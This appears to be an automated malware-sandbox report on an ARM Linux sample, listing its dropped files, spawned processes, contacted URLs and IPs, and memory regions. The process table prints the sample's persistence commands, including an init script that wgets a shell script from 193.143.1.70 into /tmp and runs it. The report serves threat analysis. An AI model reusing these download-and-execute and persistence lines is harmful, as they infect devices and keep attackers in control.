Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
arm.nn.elf
|
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/arm.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.4gWiaW (deleted)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/arm.nn.elf
|
/tmp/arm.nn.elf
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf
&\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping
arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n
exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/arm.nn.elf
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 41 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
daisy.ubuntu.com
|
162.213.35.24
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
64.54.102.170
|
unknown
|
United States
|
||
|
180.173.156.248
|
unknown
|
China
|
||
|
142.193.250.100
|
unknown
|
Canada
|
||
|
8.169.202.144
|
unknown
|
Singapore
|
||
|
78.193.184.100
|
unknown
|
France
|
||
|
98.165.231.237
|
unknown
|
United States
|
||
|
90.138.90.96
|
unknown
|
Sweden
|
||
|
217.136.72.68
|
unknown
|
Belgium
|
||
|
136.104.88.174
|
unknown
|
United States
|
||
|
14.41.97.167
|
unknown
|
Korea Republic of
|
||
|
216.164.182.9
|
unknown
|
United States
|
||
|
81.26.170.89
|
unknown
|
Germany
|
||
|
51.47.25.62
|
unknown
|
United States
|
||
|
216.129.192.0
|
unknown
|
Canada
|
||
|
37.35.86.175
|
unknown
|
Finland
|
||
|
49.75.109.227
|
unknown
|
China
|
||
|
90.10.98.24
|
unknown
|
France
|
||
|
126.37.174.202
|
unknown
|
Japan
|
||
|
187.77.132.30
|
unknown
|
Brazil
|
||
|
77.144.231.81
|
unknown
|
France
|
||
|
222.78.81.92
|
unknown
|
China
|
||
|
49.39.48.116
|
unknown
|
India
|
||
|
57.170.71.25
|
unknown
|
Belgium
|
||
|
64.191.233.175
|
unknown
|
United States
|
||
|
210.232.241.114
|
unknown
|
Japan
|
||
|
140.162.135.137
|
unknown
|
United States
|
||
|
118.223.105.59
|
unknown
|
Korea Republic of
|
||
|
101.251.135.195
|
unknown
|
China
|
||
|
128.167.204.116
|
unknown
|
United States
|
||
|
213.182.94.73
|
unknown
|
Italy
|
||
|
73.151.58.200
|
unknown
|
United States
|
||
|
49.242.199.130
|
unknown
|
Japan
|
||
|
16.78.156.21
|
unknown
|
United States
|
||
|
59.23.152.36
|
unknown
|
Korea Republic of
|
||
|
123.52.17.164
|
unknown
|
China
|
||
|
29.238.76.143
|
unknown
|
United States
|
||
|
39.208.171.238
|
unknown
|
Indonesia
|
||
|
180.116.203.93
|
unknown
|
China
|
||
|
86.111.33.173
|
unknown
|
Austria
|
||
|
47.68.50.48
|
unknown
|
United States
|
||
|
62.39.89.36
|
unknown
|
France
|
||
|
202.166.213.57
|
unknown
|
Nepal
|
||
|
79.246.253.137
|
unknown
|
Germany
|
||
|
148.81.103.170
|
unknown
|
Poland
|
||
|
179.66.145.203
|
unknown
|
Brazil
|
||
|
11.79.183.215
|
unknown
|
United States
|
||
|
125.193.95.17
|
unknown
|
Japan
|
||
|
150.4.2.248
|
unknown
|
Japan
|
||
|
45.180.244.197
|
unknown
|
Mexico
|
||
|
131.42.100.74
|
unknown
|
United States
|
||
|
151.169.74.190
|
unknown
|
United States
|
||
|
117.128.117.166
|
unknown
|
China
|
||
|
178.38.125.95
|
unknown
|
Switzerland
|
||
|
130.163.174.81
|
unknown
|
United States
|
||
|
34.71.255.62
|
unknown
|
United States
|
||
|
2.66.155.104
|
unknown
|
Sweden
|
||
|
210.116.98.112
|
unknown
|
Korea Republic of
|
||
|
45.129.12.155
|
unknown
|
United Kingdom
|
||
|
5.104.149.198
|
unknown
|
Germany
|
||
|
184.25.147.125
|
unknown
|
United States
|
||
|
84.17.217.190
|
unknown
|
Sweden
|
||
|
104.227.97.226
|
unknown
|
Canada
|
||
|
106.253.102.40
|
unknown
|
Korea Republic of
|
||
|
30.99.184.69
|
unknown
|
United States
|
||
|
5.91.52.36
|
unknown
|
Italy
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
56.14.117.227
|
unknown
|
United States
|
||
|
159.141.158.106
|
unknown
|
United States
|
||
|
94.172.2.48
|
unknown
|
Netherlands
|
||
|
176.114.39.164
|
unknown
|
Russian Federation
|
||
|
162.169.201.199
|
unknown
|
United States
|
||
|
221.106.106.33
|
unknown
|
Japan
|
||
|
6.168.60.24
|
unknown
|
United States
|
||
|
107.214.176.126
|
unknown
|
United States
|
||
|
213.211.168.121
|
unknown
|
Belgium
|
||
|
199.89.231.15
|
unknown
|
United States
|
||
|
164.184.45.197
|
unknown
|
United States
|
||
|
152.107.198.38
|
unknown
|
South Africa
|
||
|
213.177.197.254
|
unknown
|
Spain
|
||
|
50.211.213.107
|
unknown
|
United States
|
||
|
43.157.166.13
|
unknown
|
Japan
|
||
|
202.137.174.64
|
unknown
|
Australia
|
||
|
150.194.200.120
|
unknown
|
United States
|
||
|
43.155.5.103
|
unknown
|
Japan
|
||
|
199.203.133.218
|
unknown
|
United States
|
||
|
95.52.174.151
|
unknown
|
Russian Federation
|
||
|
110.135.147.45
|
unknown
|
Japan
|
||
|
164.13.76.138
|
unknown
|
Finland
|
||
|
169.240.79.38
|
unknown
|
United States
|
||
|
125.235.99.9
|
unknown
|
Viet Nam
|
||
|
33.249.141.50
|
unknown
|
United States
|
||
|
100.180.91.1
|
unknown
|
United States
|
||
|
210.96.242.174
|
unknown
|
Korea Republic of
|
||
|
191.53.9.4
|
unknown
|
Brazil
|
||
|
49.137.193.183
|
unknown
|
India
|
||
|
25.148.243.58
|
unknown
|
United Kingdom
|
||
|
82.90.187.12
|
unknown
|
Italy
|
||
|
176.164.176.57
|
unknown
|
France
|
||
|
3.68.202.181
|
unknown
|
United States
|
||
|
180.101.213.122
|
unknown
|
China
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7fc2a4033000
|
page execute read
|
|
||
|
7fc2a4033000
|
page execute read
|
|
||
|
7fc3aade6000
|
page read and write
|
|||
|
7fc3a9904000
|
page read and write
|
|||
|
7ffd95172000
|
page read and write
|
|||
|
7fc3a3fff000
|
page read and write
|
|||
|
557b764da000
|
page execute read
|
|||
|
557b7672b000
|
page read and write
|
|||
|
557b798af000
|
page read and write
|
|||
|
7fc3a9904000
|
page read and write
|
|||
|
7fc3aa500000
|
page read and write
|
|||
|
7fc3aa19e000
|
page read and write
|
|||
|
7fc2a4044000
|
page read and write
|
|||
|
557b76734000
|
page read and write
|
|||
|
7fc3aa19e000
|
page read and write
|
|||
|
7fc3aa76b000
|
page read and write
|
|||
|
7fc3aa10c000
|
page read and write
|
|||
|
7fc3aae0a000
|
page read and write
|
|||
|
7fc3aacbd000
|
page read and write
|
|||
|
7fc3aacbd000
|
page read and write
|
|||
|
7fc3aaadc000
|
page read and write
|
|||
|
7fc3aa10c000
|
page read and write
|
|||
|
7fc2a403b000
|
page read and write
|
|||
|
7ffd95172000
|
page read and write
|
|||
|
7fc3a4021000
|
page read and write
|
|||
|
557b798af000
|
page read and write
|
|||
|
557b76734000
|
page read and write
|
|||
|
557b78732000
|
page execute and read and write
|
|||
|
7fc3a4021000
|
page read and write
|
|||
|
7fc3aa500000
|
page read and write
|
|||
|
7fc3aae0a000
|
page read and write
|
|||
|
7fc3aae4f000
|
page read and write
|
|||
|
557b78749000
|
page read and write
|
|||
|
7fc3aa78e000
|
page read and write
|
|||
|
7fc3aaadc000
|
page read and write
|
|||
|
7fc3aae4f000
|
page read and write
|
|||
|
7fc2a403f000
|
page read and write
|
|||
|
557b78732000
|
page execute and read and write
|
|||
|
7fc3aa76b000
|
page read and write
|
|||
|
7fc3aa8fa000
|
page read and write
|
|||
|
557b7672b000
|
page read and write
|
|||
|
7fc3a3fff000
|
page read and write
|
|||
|
7fc3aade6000
|
page read and write
|
|||
|
7fc3aa78e000
|
page read and write
|
|||
|
7fc3aa8fa000
|
page read and write
|
|||
|
7fc2a403b000
|
page read and write
|
|||
|
557b764da000
|
page execute read
|
|||
|
557b78749000
|
page read and write
|
|||
|
7ffd951b7000
|
page execute read
|
|||
|
7fc2a403f000
|
page read and write
|
|||
|
7ffd951b7000
|
page execute read
|
There are 41 hidden memdumps, click here to show them.